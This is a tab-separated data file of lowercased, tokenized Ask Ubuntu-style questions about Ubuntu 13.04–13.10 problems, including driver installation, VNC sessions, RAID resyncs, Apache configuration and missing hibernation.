361599	how to install 32-bit brother drivers on 64-bit ubuntu 13.10 or later ?	the prerequisite for installing brother 's official linux drivers includes ia32-libs or lib32stdc++ . running sudo apt-get install ia32-libs on 13.04 and earlier fulfils this . however , ia32-libs was removed in 13.10 . running sudo apt-get install ia32-libs under 13.10 results in : reading package lists ... done building dependency tree reading state information ... done package ia32-libs is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source however the following packages replace it : lib32z1 lib32ncurses5 lib32bz2-1.0 e : package 'ia32-libs ' has no installation candidate how do i install the 32-bit drivers on my 64-bit 13.10 installation ?
361607	how to change apache2 root to media directory	i have edited the /etc/apache2/sites-available/default as . < virtualhost *:80 > serveradmin webmaster @ localhost documentroot /media/username/01cec9e69e985ed0/xampp/htdocs < directory /media/username/01cec9e69e985ed0/xampp/htdocs > options followsymlinks allowoverride none < /directory > < directory /media/username/01cec9e69e985ed0/xampp/htdocs > options indexes followsymlinks multiviews allowoverride none order allow , deny allow from all < /directory > scriptalias /cgi-bin/ /usr/lib/cgi-bin/ < directory `` /usr/lib/cgi-bin '' > allowoverride none options +execcgi -multiviews +symlinksifownermatch order allow , deny allow from all < /directory > errorlog $ { apache_log_dir } /error.log # possible values include : debug , info , notice , warn , error , crit , # alert , emerg . loglevel warn customlog $ { apache_log_dir } /access.log combined < /virtualhost > but i am recieving this message on localhost/test.php forbidden you do n't have permission to access /test.php on this server . how to solve it ?
361608	lost wireless connection	i am no longer able to get a wireless connection . the drop down menu only shows enable networking , edit connection , and vpn connection . i need to know if this is a hardware problem ?
361610	keyboard layout compatibility options disapeared in 3.10 ?	i 'm trying to find the keyboard layout options like in previous ubuntu versions to activate one vital compatibility option : '' shift with numeric keypad keys work as in ms windows '' but since i installed 3.10 all i see is the shortcut settings that also does n't really works using shift+ctrl ( bug # 1218322 ) but that 's another problem .
361611	mdadm starts resync on every boot	since a few days ( and i 'm positive it started shortly before i updated my server from 13.04- > 13.10 ) my mdadm is resyncing on every boot . in the syslog , i get the following output [ 0.809256 ] md : linear personality registered for level -1 [ 0.811412 ] md : multipath personality registered for level -4 [ 0.813153 ] md : raid0 personality registered for level 0 [ 0.815201 ] md : raid1 personality registered for level 1 [ 1.101517 ] md : raid6 personality registered for level 6 [ 1.101520 ] md : raid5 personality registered for level 5 [ 1.101522 ] md : raid4 personality registered for level 4 [ 1.106825 ] md : raid10 personality registered for level 10 [ 1.935882 ] md : bind < sdc1 > [ 1.943367 ] md : bind < sdb1 > [ 1.945199 ] md/raid1 : md0 : not clean -- starting background reconstruction [ 1.945204 ] md/raid1 : md0 : active with 2 out of 2 mirrors [ 1.945225 ] md0 : detected capacity change from 0 to 2000396680192 [ 1.945351 ] md : resync of raid array md0 [ 1.945357 ] md : minimum _guaranteed_ speed : 1000 kb/sec/disk . [ 1.945359 ] md : using maximum available idle io bandwidth ( but not more than 200000 kb/sec ) for resync . [ 1.945362 ] md : using 128k window , over a total of 1953512383k . [ 2.220468 ] md0 : unknown partition table i 'm not sure what 's up with that detected capacity change , looking at some old logs , this does have appeared earlier as well without a resync right afterwards . in fact , i let it run yesterday until completion and rebooted , and then it would n't resync , but today it does resync again . for instance , yesterday i got : [ 1.872123 ] md : bind < sdc1 > [ 1.950946 ] md : bind < sdb1 > [ 1.952782 ] md/raid1 : md0 : active with 2 out of 2 mirrors [ 1.952807 ] md0 : detected capacity change from 0 to 2000396680192 [ 1.954598 ] md0 : unknown partition table so it seems to be a problem that the raid array does not get marked as clean after every shutdown ? how can i troubleshoot this ? the disks themselves are both fine , smart tells me no errors , everything ok .
361612	touchpad does n't work after upgrade	i upgraded ubuntu from 13.04 to 13.10 on my laptop . now my touchpad does n't work anymore . but a external mouse works perfectly . i 've tried to fix the problem with `` system settings '' , `` mouse & touchpad '' . but this did n't help . what do i need to do now ?
361613	how do i change my repositories to saucy from raring after upgrade ?	during the saucy update it said that it would disable some packages , and it did . in software & updates under other software a lot of my repositories are either `` disabled on upgrade to saucy '' or end in raring . ie : http : //ppa.launchpad.net/webupd8team/java/ubuntu distribution : raring componets : main comment : disabled on upgrade to saucy do i just change the distribution to saucy ? do i have to do that to all of them ?
361615	intel wireless-n 1030 network and bluetooth	leider ist mein englisch sehr schlecht . über eine übersetzung freue ich mich. system ubuntu 13.10 64bit ich habe in meinem notebook eine 03:00.0 network controller : intel corporation centrino wireless-n 1030 [ rainbow peak ] ( rev 34 ) verbaut . wenn ich ein headset über bluetooth koppel bricht das netzwerk zusammen . arsten @ carsten-a55vd : ~ $ lsmod | grep iw iwldvm 237440 0 mac80211 596969 1 iwldvm iwlwifi 165398 1 iwldvm cfg80211 479757 3 iwlwifi , mac80211 , iwldvm carsten @ carsten-a55vd : ~ $ wenn ich kein gerät mit bluetooth verbinde ist das wlan in ordnung . verwendetet firmware iwlwifi-6000g2b-6.ucode carsten
361617	does gnome-fallback.desktop require accelerated graphics in 13.10 ?	i am trying to run gnome-fallback.desktop under vncserver . after upgrading to 13.10 , my vnc no longer works - it just shows an empty terminal window , with no session . these are the sessions that i have installed : $ ls /usr/share/xsessions/ gnome.desktop gnome-fallback.desktop xfce.desktop gnome-fallback-compiz.desktop ubuntu.desktop and this is the contents of my ~/.vnc/xstartup file , which is pointing to gnome-fallback.desktop as far as i can tell : # ! /bin/sh # uncomment the following two lines for normal desktop : unset session_manager unset dbus_session_bus_address # exec /etc/x11/xinit/xinitrc gnome-session -- session=gnome-fallback.desktop & # gnome-session -- session=gdm-session & [ -x /etc/vnc/xstartup ] & & exec /etc/vnc/xstartup [ -r $ home/.xresources ] & & xrdb $ home/.xresources xsetroot -solid grey vncconfig -iconic & x-terminal-emulator -geometry 80x24+10+10 -ls -title `` $ vncdesktop desktop '' & x-window-manager & this is the output of the log file in ~/.vnc/ : xvnc free edition 4.1.1 - built jan 14 2013 22:28:40 copyright ( c ) 2002-2005 realvnc ltd. see http : //www.realvnc.com for information on vnc . underlying x server release 40300000 , the xfree86 project , inc sat oct 19 17:37:51 2013 vncext : vnc extension running ! vncext : listening for vnc connections on port 5901 vncext : created vnc server for screen 0 error opening security policy file /etc/x11/xserver/securitypolicy could not init font path element /usr/x11r6/lib/x11/fonts/type1/ , removing from list ! could not init font path element /usr/x11r6/lib/x11/fonts/speedo/ , removing from list ! could not init font path element /usr/x11r6/lib/x11/fonts/misc/ , removing from list ! could not init font path element /usr/x11r6/lib/x11/fonts/75dpi/ , removing from list ! could not init font path element /usr/x11r6/lib/x11/fonts/100dpi/ , removing from list ! could not init font path element /usr/share/fonts/x11/75dpi/ , removing from list ! could not init font path element /usr/share/fonts/x11/100dpi/ , removing from list ! option `` -- login '' is no longer supported in this version of gnome-terminal ; you might want to create a profile with the desired setting , and use the new ' -- profile ' option gnome-session-is-accelerated : no composite extension . gnome-session-check-accelerated : helper exited with code 256 window manager warning : log level 32 : could not find xkb extension . gnome-session-is-accelerated : no composite extension . gnome-session-check-accelerated : helper exited with code 256 ** ( process:1602 ) : warning ** : software acceleration check failed : child process exited with code 1 ** ( gnome-session:1602 ) : critical ** : we failed , but the fail whale is dead . sorry ... . it seems that gnome-fallback.desktop now requires accelerated graphics ? is this correct ?
361619	left 4 dead 2 ( beta ) with fglrx slow	i have xubuntu 13.04 amd64 . i have switchable amd gpus with 6650m as dedicated , i have succesfully installed the very latest fglrx from amd website ( with package generation for good integration with dpkg ) . my dedicated gpu laughs at l4d2 on windows with maximum settings , but now on linux is fairly slow ( it 's playable but i had to downscale settings ) , the fps is about a maximum of 30 and sometimes it hangs for a bit . is it because : fglrx is slow l4d2 is still beta so when it becomes final they will fix it and will become faster not my dedicated gpu is used what is the answer and anyways how can i check if my dedicated gpu is used for games ? in catalyst control center i set use the more powerful gpu in the switchable section . hint : i play dota2 too with native resolution and high settings and that is very well playable .
361620	updating ubuntu 12.10	failed to fetch http : //packages.medibuntu.org/dists/quantal/non-free/i18n/translation-en_in something wicked happened resolving `` packages.medibuntu.org : http '' ( -5 no address associated with hostname )
361624	gnome 3.8 weather app permissions issue	i installed the weather app and added a city . however , the weather info never displayed . i was abe to see the following error information . gio.ioerrorenum : error opening file '/usr/share/gnome-shell/extensions/weather-extension @ xeked.com/weather-prefs.log ' : permission denied stack trace : weatherprefswidglet < .status @ /usr/share/gnome-shell/extensions/weather-extension @ xeked.com/prefs.js:90 wrapper @ /usr/share/gjs-1.0/lang.js:213 weatherprefswidget < .initwindow @ /usr/share/gnome-shell/extensions/weather-extension @ xeked.com/prefs.js:104 wrapper @ /usr/share/gjs-1.0/lang.js:213 weatherprefswidget < ._init @ /usr/share/gnome-shell/extensions/weather-extension @ xeked.com/prefs.js:71 wrapper @ /usr/share/gjs-1.0/lang.js:213 buildprefswidget @ /usr/share/gnome-shell/extensions/weather-extension @ xeked.com/prefs.js:653 application < ._selectextension @ /usr/share/gnome-shell/js/extensionprefs/main.js:100 wrapper @ /usr/share/gjs-1.0/lang.js:213 application < ._extensionselected @ /usr/share/gnome-shell/js/extensionprefs/main.js:119 wrapper @ /usr/share/gjs-1.0/lang.js:213 application < ._selectextension @ /usr/share/gnome-shell/js/extensionprefs/main.js:110 wrapper @ /usr/share/gjs-1.0/lang.js:213 application < ._extensionsloaded @ /usr/share/gnome-shell/js/extensionprefs/main.js:219 wrapper @ /usr/share/gjs-1.0/lang.js:213 _emit @ /usr/share/gjs-1.0/signals.js:124 extensionfinder < ._extensionsloaded @ /usr/share/gnome-shell/js/misc/extensionutils.js:178 wrapper @ /usr/share/gjs-1.0/lang.js:213 done @ /usr/share/gnome-shell/js/misc/fileutils.js:33 @ /usr/share/gnome-shell/js/misc/fileutils.js:51 onnextfilecomplete @ /usr/share/gnome-shell/js/misc/fileutils.js:21 main @ /usr/share/gnome-shell/js/extensionprefs/main.js:276 @ < command line > :1 any guidance would be appreciated .
361625	ubuntu 13.10 vnc server not working	i have installed ubuntu 13.10 and set up turbovnc , tigervnc , vnc4server and none of those vnc servers works . previously i had ubuntu 13.04 and all worked well . i am using gnome-session-fallback for the vnc session but it seams that the desktop session does not load , the vnc window is filled with a gray background image and the cursor is an `` x '' . anyone managed to get a vnc session working on ubuntu 13.10 . ( i do not want x11vnc , or vino . those work but it is not what i want . ) thank you .
361626	ubuntu for android	will ubuntu for android support samsung galaxy s2 ? ubuntu for phone as in the link , the terminal panel does not support sudo add-apt-repository ppa : phablet
361627	is there a way to enable the eclipse global menu bar ?	i have installed ubuntu 13.10 and it is working fine , but my eclipse menu bar is not integrating with the unity global menu bar , thus , i ca n't perform any operation in eclipse . i have tried various command like modifying libappmenu from vim . but eclipse entries were not found for modification . is there a way to enable the eclipse global menu bar ?
361628	gnome-panel keeps resetting at boot	i always use the gnome classic interface and i recently upgraded to 13.10 but i 've lost all elements on my top gnome-panel . it was completely empty . i could n't add any iem on it despite being able to select/drag & drop them . so i proceeded to remove the panel and create a new one . however the top gnome-panel keeps resetting at each boot , thus becoming completely empty again . what i tried ( no particular order ) : the restorepanel tool . reinstalling gnome-panel . dconf reset -f /org/gnome/gnome-panel/ ; killall gnome-panel oddly the ~/.gconf/apps/panel folder does n't exist and i could n't find the config file of the panel : it does n't seem to exist . what should i do now ? thanks for your help . edit i figured out that the cause was the size . it fits well on 24 but i ca n't set it shorter without having the icons disappear .
361629	suggestions for synthetic orchestras	i 'm looking to make some music which i have written . it is intended for groups of instruments , such as those in an orchestra . could you recommend some software for making a synthetic orchestra that can play this music ? my priorities are realism of the sounds and ease of coding of the score . thanks !
361631	can i install ubuntu to my samsung galaxy star s5282 ?	can i install ubuntu to my samsung galaxy star s5282 ? can i install ubuntu to my samsung galaxy star s5282 ?
361634	audio recorder in 13.10	i installed audio-recorder in ubuntu 13.10 , as i did before in 13.04 , and had lots of problems : no sound even after had removed the program and rebooted , sound manager not working properly , etc . i do n't understand why people do not advice audio-recorder in not a good choice anymore , and i wonder which could be the best choise now .
361639	error while upgrading to 13.10 package linux-headers-3.8.0-30 needs to be reinstalled	using lubuntu i get this error with sudo apt-get dist-upgrade e : the package linux-headers-3.8.0-30 needs to be reinstalled , but i ca n't find an archive for it . what can i do ?
361642	my network adapter dosent work with ubuntu do i need some drivers for it ?	i cant seem to get my network adapter to work with ubuntu it worked with windows vista so it should work . i think i may need some drivers
361645	apache access and error log written in same file	i have issue that access and error log are written in same file ! , the configuration in virtualhosts.conf as the following : < virtualhost *:80 > servername ************ serveradmin support @ ************8 documentroot /var/www/html/*********.com errorlog /var/log/httpd/********/********.com_error_log customlog /var/log/httpd/********/********.com_access_log combined < directory /var/www/html/***********.com > options -indexes followsymlinks allowoverride all < /directory > < /virtualhost > as you see from the configuration each access and error logs should be save separately , but both logs are written in ***.com_access_log , i have double check all permission , group and owner ... ca n't find anything wrong please advice ...
361647	about ubuntu for smartphones	i have sony ericsson w8 smartphone . i want to put it on ubuntu ground , can i do that . and if yes how i supposed to do that . tell me the tool recommendations and platform requirements for that . hope you will help me soon . thank you .
361651	missing libudev.so.0	i ca n't seem to work out how to fix the `` error while loading shared libraries : libudev.so.0 : can not open shared object file : no such file or directory '' being on 12.04 ( precise ) 64-bit , i 've tried sudo ln -sf /lib/x86_64-linux-gnu/libudev.so.1 /lib/x86_64-linux-gnu/libudev.so.0 . but to no awail .
361656	black screen after upgrade ( intel corporation 2nd generation )	i suffering from the terrible black screen issue , i recherche a little bit and it`s look like a kernel issue ? this is the boot repair info this is my graphic card 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) which vernal should i install or there is another way to solve this issue ? ? thanks miki
361657	cinnamon is broken after upgrade to 13.10	i see reports of people with unity broken after upgrading to 13.10 . in my case unity works fine but cinnamon is broken . it opens the startup applications but no window manager , no menus and the keyboad shortcuts wo n't work . as a consequence i ca n't even log out or shut down cleanly . the logs say : oct 19 10:32:42 aveline colord : profile added : icc-1727cc5030c477b20ad75593e757248d oct 19 10:32:43 aveline gnome-session [ 9157 ] : warning : app 'cinnamon.desktop ' exited with code 1 oct 19 10:32:43 aveline gnome-session [ 9157 ] : warning : app 'cinnamon.desktop ' respawning too quickly oct 19 10:32:43 aveline gnome-session [ 9157 ] : critical : we failed , but the fail whale is dead . sorry ... . oct 19 10:32:43 aveline gnome-session [ 9157 ] : warning : app 'cinnamon.desktop ' exited with code 1 oct 19 10:32:46 aveline whoopsie [ 1054 ] : online oct 19 10:32:53 whoopsie [ 1054 ] : last message repeated 12 times oct 19 10:32:53 aveline kernel : [ 1982.637049 ] python [ 9626 ] : segfault at 1511 ip b6c9e850 sp bf8d0980 error 4 in libglib-2.0.so.0.3800.0 [ b6c5b000+102000 ] oct 19 10:32:53 aveline kernel : [ 1982.837527 ] python [ 9631 ] : segfault at 0 ip b6eb13fa sp b69ff848 error 6 in libdbus-1.so.3.7.4 [ b6e89000+49000 ] oct 19 10:32:54 aveline kernel : [ 1983.030271 ] python [ 9634 ] : segfault at a6f4098b ip b6e52389 sp bfcdad68 error 4 in libdbus-1.so.3.7.4 [ b6e34000+49000 ] oct 19 10:32:54 aveline kernel : [ 1983.253259 ] python [ 9639 ] : segfault at 4 ip b6e710f4 sp b69c1bfc error 6 in libdbus-1.so.3.7.4 [ b6e4b000+49000 ] oct 19 10:32:54 aveline kernel : [ 1983.501771 ] python [ 9642 ] : segfault at b4 ip b6e0f076 sp bf82524c error 4 in libdbus-1.so.3.7.4 [ b6dfd000+49000 ] oct 19 10:32:54 aveline kernel : [ 1983.721334 ] python [ 9647 ] : segfault at 4 ip b6eab0f4 sp b69fbbfc error 6 in libdbus-1.so.3.7.4 [ b6e85000+49000 ] any idea ?
361658	installing chrome on ubuntu 13.10	installing chrome on 13.10 results in an unmet dependency error . this is due to some unnecessary dependencies having crept in , documented elsewhere . other than waiting for google to fix it , the simplest solution i 've found is as follows : goto google.co.uk/chrome and download chrome . save the file , do n't try run it . cd ~/downloads ( or wherever you put the file ) sudo dpkg -i -- ignore-depends=lib32gcc1 , lib32stdc++6 , libc6-i386 google-chrome-stable_current_i386.deb to avoid the software updater continuing to complain about dependencies : cd /var/log/dpkg cp status status.save then sudo and find `` lib32gcc1 '' . it should be in the depends : line for the google-chrome-stable package , along with lib32stdc++6 and , further along , libc6-i386 . taking care not to damage the format of the file , remove these entries . save the edited file and then run the software updater to check all is well .
361661	modify installation of 2 ubuntu versions	i had 13.10 installed , then i installed 12.04 aside . there is a problem with the graphic card when i boot 12.04 : the screen remains black after the os tried to identify it . now i would like to install a second 13.10 instead of 12.04 . but i do n't know how to install one os instead of another in this case .
361662	mouse cursor disappears when i play video in vlc	i installed ubuntu 13.10 ( i had 13.04 before , but i made clean install ) and as soon as i play video in vlc my mouse pointer disappears ... then i can get it back only when i turn off and then turn on my touchpad with function key on keyboard . after a second or two it disappears again ... then when i turn off vlc it 's working fine again ... when i use other video player ( like totem ) it does n't happen ... only with vlc ... it 's asus vivobook , with nvidia optimus card on bumblebee ( nvidia-304 ) and it has got a touch screen ( which is finally working in 13.10 ) i did not have this problem with any other ubuntu or any other distro ... any ideas ... ? ? ? thanks ...
361667	ubuntu 13.10 performance	i installed 13.10 on my pc and i have performance problems . after i type in my password i got an blackscreen for ~20sec . i tried to play dota 2 to test the performance and it is n't playable . i use my system with 2 monitors and both work . i think there is a driver problem . i installed the amd drvier . my system : - intel core 2 quad q9650 - asus p5q pro - 8gb ram - amd radeon hd 9650 - installed the amd driver with catalyst center i 'm not a linux profi , so please help me : )
361668	install gnome software center	i installed ubuntu gnome 13.10 and then upgraded the gnome version to 3.10 . but , all new apps in 3.10 such as gnome software center , maps , weather etc are not included . so now , i wonder how to get and install these apps , especially gnome software center ?
361669	wi-fi does n't connect	i 'm an ubuntu newbie . i just installed 13.10 to a formatted notebook ( clean installation ) . when i try to connect to my wireless net it tries to connect but it does n't work . the password is right and the signal is good to excellent . i just do n't get it , how can i solve this ? thank you !
361672	software purchases & accounts issue	i have installed 13.10 on a new computer and want to tranfer my purchase ( braid ) there . i have read this page about how to do this . however , when i log in to https : //software-center.ubuntu.com/subscriptions , nothing appears . my guess is that when i purchased this game , i used an older email address than the one i am currently using . ideally i would like to be able to transfer this purchase to my current ubuntu one account . or , if this is not possible , at least to have a chance to know with which account this purchase has been done so i can have a try to reinstall it somewhere else . nb : in the ubuntu software center on my older computer the game is still there and marked as `` already purchased '' . edit : this is not an upgrade issue , as my old computer has not been upgraded to 13.10 , and my newer computer is , well , new , 13.10 being its first os . note that i do n't see my purchases on the software center web site on my old as well as my new computer , which makes sense .
361675	right click change background wallpaper not working [ ubuntu 13.10 ]	just installed ubuntu 13.10 just a couple of days ago , everything was running fine , till one flaw or bug is irritating me . right click `` change background wallpaper '' is not working and instead settings window is getting open . suggest me some ways to overcome this issue .
361676	how to have a functioning minimize all windows shortcut on saucy ?	i have set up ctrl + alt + space as the hide all normal windows shortcut in the keyboard navigation of system settings . however , regardless of what i set this as , the shortcut that i created never actually works ; i have tried super + b , super + m , super + d , etc . does anyone know why ?
361677	adobe reader crashes immediately after starting	i 'm running ubuntu 12.04 32 bit system . i installed adobe reader through software center but when click on the icon to start acroread it immediately crashes during showing splash window . i 've also tried using terminal running command `` acroread '' but no gain . it even does n't show any error massage . it should be noted that to solve the problem i 've installed lsb module and ia32-libs . but my problem is not solved .
361682	software developer	i am a software developer and want to try out ubuntu . my question is : which distribution of ubuntu do you prefer , if you want to write source code in c++/opengl or java/javascipt ? thanks to your answer , and greetings from germany .
361684	wine shader model 3.0 not detected	i am trying to run eve off the latest version of wine . it was running just fine yesterday , now i go to start it and it tells me that i need shader model version 3.0 . i followed this guide here for setting up wine : http : //www.unixmen.com/install-and-configure-wine-to-play-latest-windows-games-in-linux-ubuntu-linuxmint-fedora/ i used a shortcut with the following command : wine `` /media/gibbo/games/eve/eve.exe '' now it just seems to not work ... after it was before any ideas ?
361685	ubuntu one messes up with my thunderbird folders	i have added .thunderbird folder to my ubuntu one 's folders to be synced . this is to protect my mails and my thunderbird 's settings and plugins . however , u1 constantly keeps messing up with my folders and a lot of .u1conflict files appear in various places in my .thunderbird folder . some of them i see on my thunderbird application when i start it up . why is that ? ca n't i just select my home folders files to be uploaded and not synced ? or set u1 , in case of conflicts , to leave the home folder structure and files as is . ps : i have subscribed to u1 service and this is important to me .
361692	laptop keyboard not responding after upgrade from 13.04 to 13.10	i upgraded from 13.04 to 13.10. my laptop ( lg tx express ) keyboard stoped responding to any key presses , including caps lock , esc etc . i read that other guys had the same problem ( like user200277 at 10/10/13 ) . help !
361693	kerio vpn client 64 bit !	i need 64bit version of kerio vpn client . i could not find it on kerio download site . is there anyone can give me a .deb link of it ? thanks
361694	hdd temp is not showing in ubuntu 13.10 saucy	i have installed the latest hddtemp 0.3-beta15.52 and lm-sensors 1:3.3.3 everything was fine in 13.04 raring , but after upgrade hdd temp is n't showing . i 'm using hardware sensors indicator . i 've tried with psensors but the same thing here . edit : yesterday , noticed that hddtemp tool in the terminal shows my hdd temp correct . maybe hardware system indicator does n't pull correct this temp and needs to be updated for saucy .
361699	hitching and slowness due to hdd activity on ubuntu , but not windows ?	it 's been bothering me for months now , but i 've noticed in ubuntu ( or any distro of linux i 've tried ) , any major i/o activity will cause hitching and general slowness . for example , if i try doing a file transfer from my network computer to the computer i 'm using and try moving the mouse after a while , it might not respond for a second or so . similar incidents occur in other cases too ( right-clicking to get a context menu takes a few seconds , hitting the drop-down application bar takes a while , etc ) . my hdd is n't top-notch ( a wd blue 500gb 7200rpm drive ) but i do n't recall it being nearly this bad in windows 7 , 8 , or 8.1 . cpu activity during file transfers is relatively low ( less than 10-20 % on all cores of a phenom ii x4 @ 3.3ghz ) . i 'm using gnome system monitor ( on xubuntu ) and ca n't seem to see what kind of hdd activity is occurring though . i have 8gb of ram too , which is moderately being used ( 2.5gb ) , but should n't be a problem either . any ideas what 's up ? i 've tried kernels between 3.8 and 3.11 ( i 'm using saucy currently with 3.11 ) .
361701	resize file system partition	how can i add more space to my filesystem partition . i read some answers here but this answers not work with me and this is the problem : when i boot from cd live , gparted give me the choose for minimize the filesystem partition , but does n't give me the choose to add more space ! ! notes : i have unallocated space . i 'm using ubuntu 13.04 and i boot from ubuntu 13.10 -_- this the gparted screen shoot :
361707	no sound in the web browsers ubuntu 13.04	i updated my ubuntu with the latest version of packages with the update manager and after i restarted my ubuntu , there is no sound in the web browsers anymore for eg . you tube videos run without sound although the video is fine , can anyone tell me how this can be fixed ?
361708	ca n't boot ubuntu anymore after attempting upgrade	i tried to upgrade to the latest ubuntu version 'saucy salamander ' and someone in my household logged me out at some point during the process . now i cant ' boot up . the computer goes to a gnu grub screen offering a list of verions of linux . i would be grateful for any help . the message i ca n't get past is : 'filesystem check of mount failed a maintenance check will now start control d will terminate this shell and continue booting after re - trying filesystems . any further errors will be ignored root @ matthew ... ' that is it . i ca n't do anything beyond that point and have to force a shutdown . my computer is an emachines netbook , small with just usb ports so i was thinking to get a bootable usb as a recovery ? is this a good idea ? just to update what i am doing . the gnu grub gives me 4 options , the first two are to boot with ubuntu and the 2nd two are memory tests , so now i 'm trying those memory tests .
361711	osspd/aoss/padsp do n't work with 13.10	i 'm trying to use an ancient app which relies on oss . everything works well except that there 's no sound . firstly , i tried osspd , but it does n't work , i ca n't ever see a new stream in pavucontrol . $ sudo ./osspd -- log=6 -f osspd : oss proxy v1.3.2 ( c ) 2008-2010 by tejun heo < teheo @ suse.de > osspd : creating dsp ( 14:3 ) , adsp ( 14:12 ) , mixer ( 14:0 ) osspd dbg0 : create mixer ( 24951 ) osspd dbg0 : s [ 1/24951 ] create slave=24952 /home/artem/temp/osspd-code/ossp-padsp osspd dbg0 : s [ 1/24951 ] client=24951 cmd=7:8 notify=9:10 mmap=-1:0x100000:1048576 osspd dbg1 : s [ 1/24951 ] open carg=8 din=0 rarg=0 dout=0 ossp-padsp [ artem:24952 ] warn : pa_context_subscribe ( ) failed ( bad state ) ossp-padsp [ artem:24952 ] warn : failed to subscribe to context events ( bad state ) ossp-padsp [ artem:24952 ] err : failed to connect context , state=5 ( bad state ) osspd dbg1 : s [ 1/24951 ] completed , result=-5 dout=0 osspd dbg0 : s [ 1/24951 ] removing 9 from notify poll list osspd dbg0 : s [ 1/24951 ] destroy osspd dbg1 : s [ 1/24951 ] stream dead , requesting reaping osspd dbg1 : s [ 1/24951 ] slave 24952 reaped secondly , i tried padsp and aoss , they have n't made any sound too . so , how can i fix it ? maybe there is another way of oss emulation ?
361714	android sdk tool for ubuntu	i just want to ask what is the android sdk app for ubuntu os ? i want to develop and practice making android apps . thanks !
361716	i tried to update from 13.04 to 13.10 . got the `` could not calculate the upgrade '' error	i ran grep broken /var/log/dist-upgrade/apt.log here is what i got broken libpam-systemd : i386 conflicts on libpam-xdg-support [ i386 ] < 0.2-0ubuntu2 > ( universe/admin ) broken iputils-ping : i386 depends on libgnutls-openssl27 [ i386 ] < none - > 2.12.23-1ubuntu1 > ( libs ) broken ubuntu-standard : i386 depends on dnsutils [ i386 ] < none - > 1:9.9.2.dfsg.p1-2ubuntu2 > ( net ) ` i would appreciate your help in resolving this error . thanks : )
361720	how to remove chat icons from messaging menu in 13.10 saucy	upgrading from 13.04 , the chat items ( available , away , busy , invisible , offline ) re-appeared in the messaging-menu . i use pidgin for chat , the icons do not reflect pidgin status changes . for thunderbird i want to keep the envelope . i already tried : sudo apt-get remove empathy* sudo apt-get remove gwibber* sudo apt-get remove telepathy-indicator i never had to change and recompile the messaging/indicator code as suggested e.g . in how to remove ( or hide ) chat status icons from messaging menu
361721	ubuntu heating up , continuos fan , hadoop installation worries on amd 64	i have a laptop , model : compaq presario cq40 , ram : 2.7 gb ram , processor : amd athlon x2 dual core ql - 64*2 , ubuntu 12.04.3 lts 64 bit and windows vista 32 bit ( factory installed ) my laptop gets heated up a lot when i am using ubuntu and the fan runs continuously ( i have not chosen `` continuously on '' mode for the fan in bios settings ) . i am using jupiter with power saving mode as of now , and the heat has reduced a bit . also i am using ubuntu2d instead of the default option while logging in . the temperature is 65+ degrees c when i am not doing much on my machine and gradually increases to 75+ when doing several things at once . i intend to use cdh hadoop in pseudo distributed mode on my machine . i can guess what the temperature will shoot up to then because it uses jvms . what are the possible things i can do to reduce heat and the fan noise ? note : my laptop model is not listed at www.linux-laptop.net , does that mean my laptop is `` linux-challenged '' ? my main intention is to use hadoop , i ll be happy if anyone can guide me which distro is compatible with my machine .
361725	how can i force primary display output after turning off monitor ?	i have a single hdtv attached to a single video card by two connections - vga and hdmi through a receiver . hdmi is preferential for convenience . i only need vga occasionally as it matches the native resolution . both outputs work , and hdmi ( rather , what displays sees as 'onkyo ' ) is set to primary with vga ( 'samsung tv ' ) off . this works correctly at boot and most of the time . however , if ubuntu locks/turns off the display after turning off the tuner and tv , the login screen and post-login output will go over vga instead of hdmi . if the display/screen lock does not kick-in then this does not happen . the problem appears to be independent of the order in which they are switched on again . simply running xrandr without arguments appears to fix the issue , as if the hdmi connection is not properly detected . i am running 13.04 with an ati radeon hd 4850 , open source drivers . how can i make sure the hdmi connection is selected as primary again all the time ?
361727	apps freeze in ubuntu 13.10 when trying to open them	when i try to run apps in ubuntu 13.10 the apps show force quit or cancel and after a few seconds the ubuntu restarts unknowingly .
361728	can not access nvidia-settings after upgrade to 13.10	i have just upgraded to 13.10 from 13.04 and i am having hard time finding nvidia-settings to access it . after performing updatedb i can see it in the path but it is a dead symlink $ ll /usr/bin/nvidia-settings lrwxrwxrwx 1 root root 33 apr 10 2013 /usr/bin/nvidia-settings - > /etc/alternatives/nvidia_settings $ ll /etc/alternatives/nvidia_settings lrwxrwxrwx 1 root root 56 apr 10 2013 /etc/alternatives/nvidia_settings - > /usr/lib/nvidia-settings-304-updates/bin/nvidia-settings $ ll /usr/lib/nvidia-settings-304-updates/bin/nvidia-settings ls : can not access /usr/lib/nvidia-settings-304-updates/bin/nvidia-settings : no such file or directory $ dpkg -l | grep nvidia-settings rc nvidia-settings 295.33-0ubuntu1 amd64 tool of configuring the nvidia graphics driver rc nvidia-settings-304-updates 304.88-0ubuntu1 amd64 tool for configuring the nvidia graphics driver ii nvidia-settings-319-updates 319.60-0ubuntu1 amd64 tool for configuring the nvidia graphics driver rc nvidia-settings-experimental-310 310.14-0ubuntu1 amd64 tool for configuring the nvidia graphics driver rc nvidia-settings-updates 304.51-0ubuntu2 amd64 tool for configuring the nvidia graphics driver $ dpkg -l | grep nvidia . *319 ii nvidia-310-updates 319.60-0ubuntu1 amd64 transitional package for nvidia-310-updates ii nvidia-319-updates 319.60-0ubuntu1 amd64 nvidia binary xorg driver , kernel module and vdpau library ii nvidia-settings-319-updates 319.60-0ubuntu1 amd64 tool for configuring the nvidia graphics driver
361729	is the update 13.10 good ?	i just got a update notification saying version 13.10 of ubuntu can be updated . i wanted to see if anyone has updated and if so , is it good and is there any bugs in it ? ~steam gamer
361730	no sounds after upgrade	i upgraded my ubuntu to 13.10 and now i ca n't hear any sounds . i checked on alsamixer that voices are on . for example , i ca n't hear any youtube videos .
361734	hibernation is still missing from menu in 13.10 after enabling via polkit . how to enable ?	i know that since 12.04 , we need to add a policykit rule to enable hibernation ( see question how to enable hibernation ? and the official documentation ) . i can successfully bring my laptop into hibernation mode with sudo pm-hibernate or sudo s2disk , so the rule is in place and works , but the hibernation entry is still missing in the menu . i can tell from looking through the source of the indicator-session package ( but not understanding the whole code ) that there is still a hibernation menu entry in the code and it should be displayed when the system is capable of hibernating . please calm down if you 're enraged by this . this is very unlikely to be a conspiracy , but rather a bug/regression on a deeper level , which can happen when you move code around or replace it . question : what needs to be done in 13.10 to properly tell indicator-session that the system can hibernate ? possible duplicate : hibernation still not available - no activity , because saucy was in development at that time , so out of scope for askubuntu . related bug report : https : //bugs.launchpad.net/ubuntu/+source/indicator-session/+bug/1232814
